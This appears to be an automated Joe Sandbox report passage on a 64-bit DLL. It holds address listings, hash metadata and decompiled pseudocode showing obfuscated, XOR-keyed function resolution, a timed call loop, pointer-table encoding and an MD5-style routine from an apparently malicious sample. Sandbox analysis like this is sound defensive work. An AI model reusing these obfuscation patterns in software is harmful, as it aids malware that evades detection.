                          0x7ff88c0899da
                          0x7ff88c0899e0
                          0x7ff88c0899f8
                          0x7ff88c089a07
                          0x7ff88c089a17
                          0x7ff88c089a27
                          0x7ff88c089a30
                          0x7ff88c089a47
                          0x7ff88c089a50
                          0x7ff88c089a67
                          0x7ff88c089a70
                          0x7ff88c089a89
                          0x7ff88c089aaa
                          0x7ff88c089abf
                          0x7ff88c089acb
                          0x7ff88c089ad2
                          0x7ff88c089add
                          0x7ff88c089afa
                          0x7ff88c089b1b
                          0x7ff88c089b29
                          0x7ff88c089b34
                          0x7ff88c089b3f
                          0x7ff88c089b43
                          0x7ff88c089b4d
                          0x7ff88c089b60
                          0x7ff88c089b67
                          0x7ff88c089b6e
                          0x7ff88c089b78
                          0x7ff88c089b83
                          0x7ff88c089b8e
                          0x7ff88c089b90
                          0x7ff88c089b9b
                          0x7ff88c089bae
                          0x7ff88c089bbc
                          0x7ff88c089bc0
                          0x7ff88c089bc7
                          0x7ff88c089bcd
                          0x7ff88c089bd5
                          0x7ff88c089bdc
                          0x7ff88c089be3
                          0x7ff88c089be7
                          0x7ff88c089bed
                          0x7ff88c089bf4
                          0x7ff88c089bfb
                          0x7ff88c089c00
                          0x7ff88c089c05
                          0x7ff88c089c07
                          0x7ff88c089c0a
                          0x7ff88c089c13
                          0x7ff88c089c23
                          0x7ff88c089c31
                          0x7ff88c089c42
                          0x7ff88c089c49
                          0x7ff88c089c57
                          0x7ff88c089c62
                          0x7ff88c089c6b
                          0x7ff88c089c72
                          0x7ff88c089c7d
                          0x7ff88c089c83
                          0x7ff88c089c95
                          0x7ff88c089ca2
                          0x7ff88c089cab
                          0x7ff88c089cc0
                          0x7ff88c089ccf
                          0x7ff88c089cdd
                          0x7ff88c089ceb
                          0x7ff88c089cf0
                          0x7ff88c089cf6
                          0x7ff88c089cfe
                          0x7ff88c089d06
                          0x7ff88c089d2e
                          0x7ff88c089d31
                          0x7ff88c089d38
                          0x7ff88c089d49
                          0x7ff88c089d5a
                          0x7ff88c089d68
                          0x7ff88c089d73
                          0x7ff88c089d76
                          0x7ff88c089d7d
                          0x7ff88c089d80
                          0x7ff88c089d8a
                          0x7ff88c089da1
                          0x7ff88c089dac
                          0x7ff88c089db4
                          0x7ff88c089dbb
                          0x7ff88c089dc0
                          0x7ff88c089dc5
                          0x7ff88c089dc9
                          0x7ff88c089dd0
                          0x7ff88c089dd7
                          0x7ff88c089ddd
                          0x7ff88c089de3
                          0x7ff88c089df8
                          0x7ff88c089dfc
                          0x7ff88c089e00
                          0x7ff88c089e04
                          0x7ff88c089e09
                          0x7ff88c089e0e
                          0x7ff88c089e13
                          0x7ff88c089e16
                          0x7ff88c089e1b
                          0x7ff88c089e1f
                          0x7ff88c089e2f
                          0x7ff88c089e47
                          0x7ff88c089e4f
                          0x7ff88c089e52
                          0x7ff88c089e60
                          0x7ff88c089e67
                          0x7ff88c089e70
                          0x7ff88c089e73
                          0x7ff88c089e7a
                          0x7ff88c089e81
                          0x7ff88c089e8c
                          0x7ff88c089e93
                          0x7ff88c089ea4
                          0x7ff88c089eac
                          0x7ff88c089ec0
                          0x7ff88c089ed1
                          0x7ff88c089ed8
                          0x7ff88c089eed
                          0x7ff88c089efb
                          0x7ff88c089f03
                          0x7ff88c089f27
                          0x7ff88c089f2b
                          0x7ff88c089f2f
                          0x7ff88c089f33
                          0x7ff88c089f38
                          0x7ff88c089f42
                          0x7ff88c089f46
                          0x7ff88c089f4b
                          0x7ff88c089f4f
                          0x7ff88c089f79

                          Strings
                          • y but matter August platforms wavy periodic alternate will stale capital wave technique computer dared hobby garments chose crawled microphone politics arcadia roman demolition hanky softly ticket fur jug plunged tower goodness prop telegram zoological doorway, xrefs: 00007FF88C089A60
                          Memory Dump Source
                          • Source File: 00000000.00000002.402580217.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000000.00000002.402568884.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402605810.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402623535.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402632388.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402643514.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402657425.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff88c070000_loaddll64.jbxd
                          Similarity
                          • API ID:
                          • String ID: y but matter August platforms wavy periodic alternate will stale capital wave technique computer dared hobby garments chose crawled microphone politics arcadia roman demolition hanky softly ticket fur jug plunged tower goodness prop telegram zoological doorway
                          • API String ID: 0-156379247
                          • Opcode ID: 85bbfddf9d8429de60b2b2be73729eb057ebefaedf4f10f86c3e2610b7d79d4e
                          • Instruction ID: 28d2a2e16324b4ff82a8eb92a508ae05a1c8ca0cea25c51e811f3201fef519c6
                          • Opcode Fuzzy Hash: 85bbfddf9d8429de60b2b2be73729eb057ebefaedf4f10f86c3e2610b7d79d4e
                          • Instruction Fuzzy Hash: 53F1DC736156C48BD761CF19D488BDE77A8F788B88F148136EB4907B68DB39D952CB00
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 67%
                          			E0000027E27ED3719D6C(void* __ebx, void* __edx, long long __rbx, long long __rcx, void* __rdx, void* __r8, void* __r9, void* __r10, void* __r11, void* _a8, signed int _a16, char _a24, char _a32) {
                          				void* _v48;
                          				intOrPtr _v56;
                          				intOrPtr _v64;
                          				signed long long _v72;
                          				char _v80;
                          				char _v88;
                          				long long _v96;
                          				signed long long _v104;
                          				void* __rdi;
                          				void* __rsi;
                          				void* __rbp;
                          				signed int _t81;
                          				long long _t155;
                          				signed long long _t156;
                          				long long _t159;
                          				long long* _t163;
                          				long long _t196;
                          				long long _t198;
                          				long long _t200;
                          				void* _t203;
                          				long long _t205;
                          				signed int* _t212;
                          				void* _t230;
                          				void* _t232;
                          				void* _t234;
                          
                          				_t231 = __r11;
                          				_t230 = __r10;
                          				_t155 = _t205;
                          				 *((long long*)(_t155 + 8)) = __rbx;
                          				r12d =  *0xd371d450;
                          				 *(_t155 + 0x20) =  *(_t155 + 0x20) & 0x00000000;
                          				_t159 = __rcx;
                          				_t163 = _t155 - 0x40;
                          				if (E0000027E27ED37188C8(__rcx, _t163, _t196, _t198, _t203, _t234, _t232) != 0) goto 0xd371a08e;
                          				r9d = ( *(_t159 + 0x40))[1] & 0x0000ffff;
                          				if (_t163 - __r9 + 8 <= 0) goto 0xd3719ddc;
                          				if ((r12d ^ 0xe49a1e6d) == 0) goto 0xd3719dde;
                          				E0000027E27ED3714D70(r12d ^ 0xe49a1e6d, __r9 +  &(( *(_t159 + 0x40))[4]));
                          				_t200 = _t155;
                          				goto 0xd3719dde;
                          				if (_t200 == 0) goto 0xd371a084;
                          				_t13 = _t159 + 0xc0; // 0xc0
                          				_v96 = _t200;
                          				_v104 = _v104 & 0x00000000;
                          				if (E0000027E27ED37184E8(_t200, _t155, _t159, _t13, _v64, _t200, _t203,  *((intOrPtr*)(_t159 + 0x30)),  *((intOrPtr*)(_t159 + 0x38)), _t196, _t198) != 0) goto 0xd371a084;
                          				_t156 =  *((intOrPtr*)(_t159 + 0x28));
                          				_v72 = _t156;
                          				if (E0000027E27ED37191C8( *( *(_t159 + 0x40)) & 0x0000ffff, r12d ^ 0x61f25585, _t156, _t159, _t200, _v64, _t196, _t200,  &_v80,  &_a24, __r11) != 0) goto 0xd3719e60;
                          				_t212 =  &_a16;
                          				if (E0000027E27ED371672C(_v80, _v64, _t212) == 0) goto 0xd3719e60;
                          				goto 0xd3719e69;
                          				_a16 = 0;
                          				E0000027E27ED371908C(0xab05e147, _t156,  *((intOrPtr*)( *0xd371d458 + 0x18)));
                          				if (_t156 == 0) goto 0xd3719e97;
                          				r8d = 0;
                          				_t27 = _t212 + 1; // 0x1
                          				r9d = 0;
                          				 *_t156();
                          				goto 0xd3719e9c;
                          				if (0x7f != 0x102) goto 0xd371a084;
                          				 *(_t159 + 0x64) = 0x3e8;
                          				if (E0000027E27ED37191C8(_t27, r12d ^ 0x64d094d6, _t156, _t159, _t200,  &_v72, _t196, _t200,  &_v80,  &_a24, __r11) != 0) goto 0xd3719eee;
                          				_v104 = _v104 & 0x00000000;
                          				r9d = 0;
                          				E0000027E27ED37114B8(_t156, _t159, _t159, 0x27ed37134a4, _t200, _v80,  &_a24);
                          				if (E0000027E27ED37191C8(_t27, r12d ^ 0xdd4632ba, _t156, _t159, _t200, 0x27ed37134a4, _t196, _t200,  &_v80,  &_a24, _t231) != 0) goto 0xd3719f3c;
                          				if (E0000027E27ED371672C(_v80, 0x27ed37134a4,  &_a16) == 0) goto 0xd3719f3c;
                          				_t81 = _a16;
                          				if (_t81 == 0) goto 0xd3719f3c;
                          				 *(_t159 + 0x64) = _t81 * 0x3e8;
                          				if (E0000027E27ED37191C8(_t27, r12d ^ 0x705ce798, _t156, _t159, _t200, 0x27ed37134a4, _t196, _t200,  &_v80,  &_a24, _t231) != 0) goto 0xd3719f7f;
                          				if (E0000027E27ED371672C(_v80, 0x27ed37134a4,  &_a16) == 0) goto 0xd3719f7f;
                          				goto 0xd3719f88;
                          				_a16 = 0;
                          				r12d = r12d ^ 0xe5c7ba87;
                          				if (E0000027E27ED37191C8(_t27, r12d, _t156, _t159, _t200, 0x27ed37134a4, _t196, _t200,  &_v80,  &_a24, _t231) != 0) goto 0xd3719ffa;
                          				if (E0000027E27ED371672C(_v80, 0x27ed37134a4,  &_a32) == 0) goto 0xd3719ffa;
                          				E0000027E27ED371908C(0x9c66d81c, _t156,  *((intOrPtr*)( *0xd371d458 + 0x18)));
                          				if (_t156 == 0) goto 0xd3719fdd;
                          				 *_t156();
                          				 *((intOrPtr*)(_t159 + 0x60)) = _a32;
                          				 *((long long*)(_t159 + 0x58)) = _t156 * 0x23c34600 + _v56;
                          				if (E0000027E27ED3712DC4(_t159,  &_v48,  &_v88) != 0) goto 0xd371a022;
                          				r8d = _v88;
                          				E0000027E27ED3717258(0, _t159, _t159, _v48, _t230);
                          				E0000027E27ED371908C(0xab05e147, _t156,  *((intOrPtr*)( *0xd371d458 + 0x18)));
                          				if (_t156 == 0) goto 0xd371a051;
                          				r8d = 0;
                          				r9d = 0;
                          				r9d = r9d * 0x3e8;
                          				 *_t156();
                          				goto 0xd371a056;
                          				if (0x7f != 0) goto 0xd3719ffa;
                          				if ( *((intOrPtr*)(_t159 + 0x50)) == 0) goto 0xd371a084;
                          				E0000027E27ED3712874( *((intOrPtr*)( *0xd371d458 + 8)),  *((intOrPtr*)(_t159 + 0x50)), _t196,  *((intOrPtr*)(_t159 + 0x50)));
                          				HeapFree(_t203, ??);
                          				0xd371a568();
                          				asm("lock inc ecx");
                          				return 0x7f;
                          			}




























                          0x27ed3719d6c
                          0x27ed3719d6c
                          0x27ed3719d6c
                          0x27ed3719d6f
                          0x27ed3719d85
                          0x27ed3719d8c
                          0x27ed3719d90
                          0x27ed3719d93
                          0x27ed3719da0
                          0x27ed3719dad
                          0x27ed3719dc2
                          0x27ed3719dcb
                          0x27ed3719dd2
                          0x27ed3719dd7
                          0x27ed3719dda
                          0x27ed3719de1
                          0x27ed3719df4
                          0x27ed3719dfb
                          0x27ed3719e00
                          0x27ed3719e0e
                          0x27ed3719e14
                          0x27ed3719e31
                          0x27ed3719e3d
                          0x27ed3719e44
                          0x27ed3719e55
                          0x27ed3719e5e
                          0x27ed3719e62
                          0x27ed3719e72
                          0x27ed3719e7a
                          0x27ed3719e7c
                          0x27ed3719e8a
                          0x27ed3719e8e
                          0x27ed3719e91
                          0x27ed3719e95
                          0x27ed3719ea2
                          0x27ed3719ec1
                          0x27ed3719ecf
                          0x27ed3719ed6
                          0x27ed3719ee3
                          0x27ed3719ee9
                          0x27ed3719f0e
                          0x27ed3719f26
                          0x27ed3719f28
                          0x27ed3719f31
                          0x27ed3719f39
                          0x27ed3719f5c
                          0x27ed3719f74
                          0x27ed3719f7d
                          0x27ed3719f81
                          0x27ed3719f88
                          0x27ed3719fa9
                          0x27ed3719fc1
                          0x27ed3719fcc
                          0x27ed3719fd4
                          0x27ed3719fdb
                          0x27ed3719fe7
                          0x27ed3719ff6
                          0x27ed371a00e
                          0x27ed371a010
                          0x27ed371a01d
                          0x27ed371a02b
                          0x27ed371a033
                          0x27ed371a035
                          0x27ed371a038
                          0x27ed371a044
                          0x27ed371a04b
                          0x27ed371a04f
                          0x27ed371a058
                          0x27ed371a061
                          0x27ed371a071
                          0x27ed371a07e
                          0x27ed371a089
                          0x27ed371a08e
                          0x27ed371a0a9

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.402437262.0000027ED3710000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027ED3710000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_27ed3710000_loaddll64.jbxd
                          Similarity
                          • API ID: Heap$Alloc$Free
                          • String ID:
                          • API String ID: 1549400367-0
                          • Opcode ID: 8cda5ef62eee2583e1016891d8b3408c524cec5b4a551b585b2903ac7aa30cdf
                          • Instruction ID: 89c87e035d6cd7711f29d1e565d694e002be0b01c21b63e7b8dcf3d5af9f63f4
                          • Opcode Fuzzy Hash: 8cda5ef62eee2583e1016891d8b3408c524cec5b4a551b585b2903ac7aa30cdf
                          • Instruction Fuzzy Hash: 5591B333608A85C1EFB0DF61D44439BA7A9E7CAB94F426056EE4D477CADE38C446C7A0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 53%
                          			E00007FF87FF88C07DCAC(void* __eax, signed int __edx, long long __rbx, signed long long*** __rcx, long long __rdi, signed long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
                          				void* _t28;
                          				signed int _t56;
                          				void* _t58;
                          				void* _t69;
                          				signed long long _t70;
                          				void* _t75;
                          				signed int* _t81;
                          				signed long long _t83;
                          				signed long long _t85;
                          				signed long long _t86;
                          				signed long long _t102;
                          				signed long long _t103;
                          				signed long long _t105;
                          				signed long long _t111;
                          				signed long long _t113;
                          				void* _t122;
                          				signed long long _t125;
                          				signed long long _t126;
                          				signed long long _t127;
                          				signed long long* _t132;
                          				void* _t133;
                          				signed long long _t137;
                          				signed long long*** _t140;
                          
                          				_t113 = __rsi;
                          				_t56 = __edx;
                          				_t69 = _t122;
                          				 *((long long*)(_t69 + 8)) = __rbx;
                          				 *((long long*)(_t69 + 0x10)) = __rbp;
                          				 *((long long*)(_t69 + 0x18)) = __rsi;
                          				 *((long long*)(_t69 + 0x20)) = __rdi;
                          				_push(_t133);
                          				_t70 =  *((intOrPtr*)(__rcx));
                          				_t140 = __rcx;
                          				_t81 =  *_t70;
                          				if (_t81 != 0) goto 0x8c07dce1;
                          				goto 0x8c07de67;
                          				_t125 =  *0x8c0b3760; // 0xa7d9df492a3c
                          				r12d = 0x40;
                          				_t118 =  *_t81 ^ _t125;
                          				asm("dec eax");
                          				_t83 = _t81[4] ^ _t125;
                          				asm("dec ecx");
                          				asm("dec eax");
                          				if ((_t81[2] ^ _t125) != _t83) goto 0x8c07dde1;
                          				_t85 = _t83 - ( *_t81 ^ _t125) >> 3;
                          				_t108 =  >  ? _t70 : _t85;
                          				_t109 = ( >  ? _t70 : _t85) + _t85;
                          				_t110 =  ==  ? _t70 : ( >  ? _t70 : _t85) + _t85;
                          				if (( ==  ? _t70 : ( >  ? _t70 : _t85) + _t85) - _t85 < 0) goto 0x8c07dd60;
                          				r8d = _t133 - 0x38;
                          				E00007FF87FF88C080B44(_t133 - 0x20, r8d & 0x0000003f, _t58, _t85, _t118,  ==  ? _t70 : ( >  ? _t70 : _t85) + _t85, __rsi, _t118, _t125);
                          				_t28 = E00007FF87FF88C07E114(_t70, _t118);
                          				if (_t70 != 0) goto 0x8c07dd88;
                          				_t111 = _t85 + 4;
                          				r8d = 8;
                          				E00007FF87FF88C080B44(_t28, 0, _t58, _t85, _t118, _t111, _t113, _t118, _t125);
                          				_t137 = _t70;
                          				E00007FF87FF88C07E114(_t70, _t118);
                          				if (_t137 == 0) goto 0x8c07dcd9;
                          				_t126 =  *0x8c0b3760; // 0xa7d9df492a3c
                          				_t132 = _t137 + _t85 * 8;
                          				_t86 = _t137 + _t111 * 8;
                          				asm("dec eax");
                          				_t75 =  >  ? _t113 : _t86 - _t132 + 7 >> 3;
                          				if (_t75 == 0) goto 0x8c07dde1;
                          				 *_t132 = _t113 ^ _t126;
                          				if (_t113 + 1 != _t75) goto 0x8c07ddcb;
                          				_t127 =  *0x8c0b3760; // 0xa7d9df492a3c
                          				asm("dec eax");
                          				 *_t132 =  *(_t140[1]) ^ _t127;
                          				_t102 =  *0x8c0b3760; // 0xa7d9df492a3c
                          				asm("dec eax");
                          				 *( *( *_t140)) = _t137 ^ _t102;
                          				_t103 =  *0x8c0b3760; // 0xa7d9df492a3c
                          				asm("dec ecx");
                          				( *( *_t140))[1] =  &(_t132[1]) ^ _t103;
                          				_t105 =  *0x8c0b3760; // 0xa7d9df492a3c
                          				r12d = r12d - (_t56 & 0x0000003f);
                          				asm("dec eax");
                          				( *( *_t140))[2] = _t86 ^ _t105;
                          				return 0;
                          			}


























                          0x7ff88c07dcac
                          0x7ff88c07dcac
                          0x7ff88c07dcac
                          0x7ff88c07dcaf
                          0x7ff88c07dcb3
                          0x7ff88c07dcb7
                          0x7ff88c07dcbb
                          0x7ff88c07dcbf
                          0x7ff88c07dcc9
                          0x7ff88c07dcce
                          0x7ff88c07dcd1
                          0x7ff88c07dcd7
                          0x7ff88c07dcdc
                          0x7ff88c07dce1
                          0x7ff88c07dce8
                          0x7ff88c07dcff
                          0x7ff88c07dd05
                          0x7ff88c07dd08
                          0x7ff88c07dd0b
                          0x7ff88c07dd0e
                          0x7ff88c07dd14
                          0x7ff88c07dd22
                          0x7ff88c07dd2c
                          0x7ff88c07dd35
                          0x7ff88c07dd38
                          0x7ff88c07dd3f
                          0x7ff88c07dd41
                          0x7ff88c07dd4c
                          0x7ff88c07dd56
                          0x7ff88c07dd5e
                          0x7ff88c07dd60
                          0x7ff88c07dd64
                          0x7ff88c07dd70
                          0x7ff88c07dd77
                          0x7ff88c07dd7a
                          0x7ff88c07dd82
                          0x7ff88c07dd88
                          0x7ff88c07dd8f
                          0x7ff88c07dd96
                          0x7ff88c07dda5
                          0x7ff88c07ddc2
                          0x7ff88c07ddc9
                          0x7ff88c07ddce
                          0x7ff88c07ddd8
                          0x7ff88c07ddda
                          0x7ff88c07ddf6
                          0x7ff88c07de00
                          0x7ff88c07de03
                          0x7ff88c07de16
                          0x7ff88c07de1f
                          0x7ff88c07de25
                          0x7ff88c07de36
                          0x7ff88c07de3f
                          0x7ff88c07de43
                          0x7ff88c07de4f
                          0x7ff88c07de58
                          0x7ff88c07de63
                          0x7ff88c07de85

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.402580217.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000000.00000002.402568884.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402605810.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402623535.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402632388.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402643514.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402657425.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff88c070000_loaddll64.jbxd
                          Similarity
                          • API ID:
                          • String ID: @
                          • API String ID: 0-2766056989
                          • Opcode ID: 6a2f00e78af9205e3927e894e094624766f0c97d95118ad37cd236d1ad0ae9d3
                          • Instruction ID: 22231035c5b16da8b861e74356685b9b60e125166b56cd87a69b62be3e278406
                          • Opcode Fuzzy Hash: 6a2f00e78af9205e3927e894e094624766f0c97d95118ad37cd236d1ad0ae9d3
                          • Instruction Fuzzy Hash: 7841BF72714B4886EE08CF2AE9251A977A1FB5AFC4B599036DE0D8B758EF3DD542C300
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 56%
                          			E0000027E27ED371A918(void* __eflags, void* __rax, long long __rbx, long long __rcx, void* __rdx, void* __r9, void* __r10, void* __r11, void* _a8, long long _a16, intOrPtr _a24) {
                          				void* _v60;
                          				void* _v64;
                          				intOrPtr _v68;
                          				void* _v72;
                          				void* _v76;
                          				intOrPtr _v80;
                          				intOrPtr _v84;
                          				void* _v88;
                          				intOrPtr _v92;
                          				void* _v96;
                          				intOrPtr _v100;
                          				void* _v104;
                          				void* _v108;
                          				void* _v112;
                          				intOrPtr _v116;
                          				intOrPtr _t385;
                          				signed int _t388;
                          				signed int _t567;
                          				signed int _t596;
                          				signed char* _t610;
                          				signed char* _t611;
                          				void* _t612;
                          				void* _t613;
                          				signed int* _t616;
                          				signed int* _t617;
                          				void* _t619;
                          				intOrPtr* _t620;
                          
                          				_a16 = __rbx;
                          				_a8 = __rcx;
                          				r10d =  *(__rcx + 4);
                          				r11d =  *((intOrPtr*)(__rcx + 8));
                          				_a24 =  *((intOrPtr*)(__rcx));
                          				_t610 = __rdx + 2;
                          				_t616 = _t613 - 0x40;
                          				r9d = 0x10;
                          				_t611 =  &(_t610[4]);
                          				 *_t616 = (((_t610[1] & 0x000000ff) << 0x00000008 |  *_t610 & 0x000000ff) << 0x00000008 |  *(_t611 - 5) & 0x000000ff) << 0x00000008 |  *(_t611 - 6) & 0x000000ff;
                          				_t617 =  &(_t616[1]);
                          				_t619 = __r9 - 1;
                          				if (__eflags != 0) goto 0xd371a953;
                          				r15d = _v100;
                          				r12d = _v92;
                          				asm("rol edx, 0x7");
                          				r8d = __rcx + __rbx - 0x173848aa;
                          				asm("inc ecx");
                          				r8d = r8d + __rcx + _t612 - 0x28955b88 + r10d;
                          				r9d = __rcx + __r11 + 0x242070db;
                          				asm("inc ecx");
                          				r9d = r9d + r8d;
                          				r10d = __rcx + __r10 - 0x3e423112;
                          				asm("inc ecx");
                          				r10d = r10d + r9d;
                          				r11d = __rcx + _t611 - 0xa83f051;
                          				asm("inc ecx");
                          				r11d = r11d + r10d;
                          				asm("rol edx, 0xc");
                          				r8d = __rcx + _t619 - 0x57cfb9ed;
                          				asm("inc ecx");
                          				r8d = r8d + __rcx +  &(_t617[0x11e1f18a]) + r11d;
                          				r9d = __rcx + __r10 - 0x2b96aff;
                          				asm("inc ecx");
                          				r13d = _v80;
                          				r14d = _v68;
                          				r9d = r9d + r8d;
                          				r10d = __rcx + __r11 + 0x698098d8;
                          				asm("inc ecx");
                          				r10d = r10d + r9d;
                          				asm("rol edx, 0xc");
                          				asm("ror edi, 0xf");
                          				r9d = __rcx + _t619 - 0x76a32842;
                          				asm("inc ecx");
                          				r9d = r9d + __rcx + _t617 - 0xa44f + __rcx + _t611 - 0x74bb0851 + r10d;
                          				r11d = __rcx + __r10 + 0x6b901122;
                          				asm("inc ecx");
                          				r11d = r11d + r9d;
                          				asm("rol ebx, 0xc");
                          				_t388 = __rcx + _t611 - 0x2678e6d + r11d;
                          				r8d = _t388;
                          				r8d =  !r8d;
                          				r10d = __rcx + _t612 - 0x5986bc72;
                          				asm("inc ecx");
                          				r10d = r10d + _t388;
                          				r8d = r8d & r10d;
                          				r9d = __rcx + _t619 + 0x49b40821;
                          				asm("inc ecx");
                          				r9d = r9d + r10d;
                          				r8d = r8d | _t388 & r9d;
                          				r8d = r8d + _v116;
                          				r11d = _t617 + __r11 - 0x9e1da9e;
                          				asm("inc ecx");
                          				r11d = r11d + r9d;
                          				r8d =  &(_t611[__rbx - 0x3fbf4cc0]);
                          				asm("inc ecx");
                          				r8d = r8d + r11d;
                          				asm("rol edx, 0xe");
                          				r10d = __rcx + _t619 - 0x16493856;
                          				asm("inc ecx");
                          				r10d = r10d + __rcx + __r10 + 0x265e5a51 + r8d;
                          				r9d = __rcx + __r11 - 0x29d0efa3;
                          				asm("inc ecx");
                          				r9d = r9d + r10d;
                          				r11d = __rcx +  &(_t617[0x910514]);
                          				asm("inc ecx");
                          				r11d = r11d + r9d;
                          				r8d = __rcx + _t611 - 0x275e197f;
                          				asm("inc ecx");
                          				r8d = r8d + r11d;
                          				asm("ror edx, 0xc");
                          				r10d = __rcx + _t619 + 0x21e1cde6;
                          				asm("inc ecx");
                          				r10d = r10d + __rcx + __r10 - 0x182c0438 + r8d;
                          				r9d = __rcx + __r11 - 0x3cc8f82a;
                          				asm("inc ecx");
                          				r9d = r9d + r10d;
                          				r11d = __rcx + _t617 - 0xb2af279;
                          				asm("inc ecx");
                          				r11d = r11d + r9d;
                          				asm("ror ebx, 0xc");
                          				asm("rol edx, 0x5");
                          				r8d = __rcx + _t619 - 0x3105c08;
                          				asm("inc ecx");
                          				r8d = r8d + __rcx + __r10 - 0x561c16fb + __rcx +  &(_t611[0x455a14ed]) + r11d;
                          				r9d = __rcx + __r11 + 0x676f02d9;
                          				asm("inc ecx");
                          				r9d = r9d + r8d;
                          				r10d = __rcx + __rbx - 0x72d5b376;
                          				asm("inc ecx");
                          				r10d = r10d + r9d;
                          				asm("rol edx, 0x4");
                          				r8d = __rax + _t617 - 0x788e097f;
                          				asm("inc ecx");
                          				r8d = r8d + __rax + _t611 - 0x5c6be + r10d;
                          				r9d = __rax + _t619 + 0x6d9d6122;
                          				asm("inc ecx");
                          				r9d = r9d + r8d;
                          				r10d = __rax + __r10 - 0x21ac7f4;
                          				asm("inc ecx");
                          				r10d = r10d + r9d;
                          				r11d = __rcx + _t611 - 0x5b4115bc;
                          				asm("inc ecx");
                          				r11d = r11d + r10d;
                          				asm("rol edx, 0xb");
                          				r8d = __rax + _t619 - 0x944b4a0;
                          				asm("inc ecx");
                          				r8d = r8d + __rax +  &(_t617[0x12f7b3ea]) + r11d;
                          				r9d = __rax + __r10 - 0x41404390;
                          				asm("inc ecx");
                          				r9d = r9d + r8d;
                          				r10d = __rcx + __r11 + 0x289b7ec6;
                          				asm("inc ecx");
                          				r10d = r10d + r9d;
                          				r11d = __rax + _t611 - 0x155ed806;
                          				asm("inc ecx");
                          				r11d = r11d + r10d;
                          				r8d = __rax + _t617 - 0x2b10cf7b;
                          				asm("inc ecx");
                          				r8d = r8d + r11d;
                          				asm("ror edx, 0x9");
                          				r9d = __rcx + __r10 - 0x262b2fc7;
                          				asm("inc ecx");
                          				r9d = r9d + __rax + _t619 + 0x4881d05 + r8d;
                          				asm("rol ecx, 0xb");
                          				r10d = __rax +  &(_t617[0x7e89f3e]);
                          				asm("inc ecx");
                          				r10d = r10d + __rax + __r11 - 0x1924661b + r9d;
                          				r8d = __rax + _t611 - 0x3b53a99b;
                          				asm("inc ecx");
                          				r8d = r8d + r10d;
                          				asm("rol edx, 0x6");
                          				r9d = __rax + __rcx + 0x432aff97;
                          				asm("inc ecx");
                          				r9d = r9d + __rax + _t619 - 0xbd6ddbc + r8d;
                          				asm("rol ecx, 0xf");
                          				r10d = __rax + _t617 - 0x36c5fc7;
                          				asm("inc ecx");
                          				r10d = r10d + __rax + __r10 - 0x546bdc59 + r9d;
                          				r8d = __rax +  &(_t611[0x655b59c3]);
                          				asm("inc ecx");
                          				r8d = r8d + r10d;
                          				asm("rol edx, 0xa");
                          				r9d = __rax + __rcx - 0x100b83;
                          				asm("inc ecx");
                          				r9d = r9d + __rax + _t619 - 0x70f3336e + r8d;
                          				asm("ror ecx, 0xb");
                          				r10d = __rax +  &(_t617[0x1bea1f93]);
                          				asm("inc ecx");
                          				r10d = r10d + __rax + __r10 - 0x7a7ba22f + r9d;
                          				r11d = __rax + _t611 - 0x1d31920;
                          				asm("inc ecx");
                          				r11d = r11d + r10d;
                          				r9d = __rax + _t619 - 0x5cfebcec;
                          				asm("inc ecx");
                          				r9d = r9d + r11d;
                          				asm("ror ebx, 0xb");
                          				r8d = __rax + __r10 - 0x8ac817e;
                          				asm("inc ecx");
                          				r8d = r8d + __rax + __rcx + 0x4e0811a1 + r9d;
                          				asm("rol edx, 0xa");
                          				_t596 = __rax + __r11 - 0x42c50dcb + r8d;
                          				_t620 = _a8;
                          				asm("rol ecx, 0xf");
                          				r8d =  !r8d;
                          				 *_t620 = _a24 + r8d;
                          				_t567 = __rax + _t619 + 0x2ad7d2bb + _t596;
                          				r8d = r8d | _t567;
                          				r8d = r8d ^ _t596;
                          				r8d = r8d + _v84;
                          				asm("ror eax, 0xb");
                          				 *((intOrPtr*)(_t620 + 4)) = _t617 + __rbx - 0x14792c6f +  *((intOrPtr*)(_t620 + 4)) + _t567;
                          				 *((intOrPtr*)(_t620 + 8)) =  *((intOrPtr*)(_t620 + 8)) + _t567;
                          				_t385 =  *((intOrPtr*)(_t620 + 0xc)) + _t596;
                          				 *((intOrPtr*)(_t620 + 0xc)) = _t385;
                          				return _t385;
                          			}






























                          0x27ed371a918
                          0x27ed371a91d
                          0x27ed371a933
                          0x27ed371a937
                          0x27ed371a93e
                          0x27ed371a945
                          0x27ed371a949
                          0x27ed371a94d
                          0x27ed371a95a
                          0x27ed371a975
                          0x27ed371a978
                          0x27ed371a97c
                          0x27ed371a980
                          0x27ed371a982
                          0x27ed371a987
                          0x27ed371a9a8
                          0x27ed371a9bd
                          0x27ed371a9c5
                          0x27ed371a9c9
